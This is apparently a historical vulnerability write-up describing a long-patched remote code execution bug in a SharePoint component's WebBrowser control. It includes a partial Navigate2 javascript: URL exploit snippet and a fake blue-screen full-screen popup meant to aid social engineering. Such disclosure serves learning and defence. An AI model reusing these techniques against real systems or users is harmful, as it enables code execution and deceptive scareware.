This was a remote code execution finding in a SharePoint component that exposed the WebBrowser control (WebOC) to web content via a CFD (Client-side Framework for DHTML) integration. The Navigate2 API could be called with a javascript: URL that injected a Windows Media Player object into a local-zone document and controlled it, or could directly launch local executables.

RCE via Modeless Dialog + WebOC Navigate2

wbControl.Navigate2(
    'javascript:void(document.body.innerHTML = ' +
    '"CMD<object classid=clsid:6BF52A52...></object>")',
    0, 'ifr_localFile'
);

Full-Screen Overlay via createPopup (Social Engineering Aid)

// createpopup.html — fake BSOD covering the entire screen
var a = createPopup();
a.document.body.style.backgroundColor = "blue";
a.document.body.innerHTML = "<h1>A problem has been detected...</h1>";
a.show(0, 0, screen.width, screen.height);

The core issue was the same as in the Silverlight WebOC finding: Navigate2 with a javascript: URL ran the script in the hosting document’s zone rather than the appropriate sandboxed zone. In this case the hosting document was a local-zone SharePoint page, giving the injected script full local-machine privileges.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.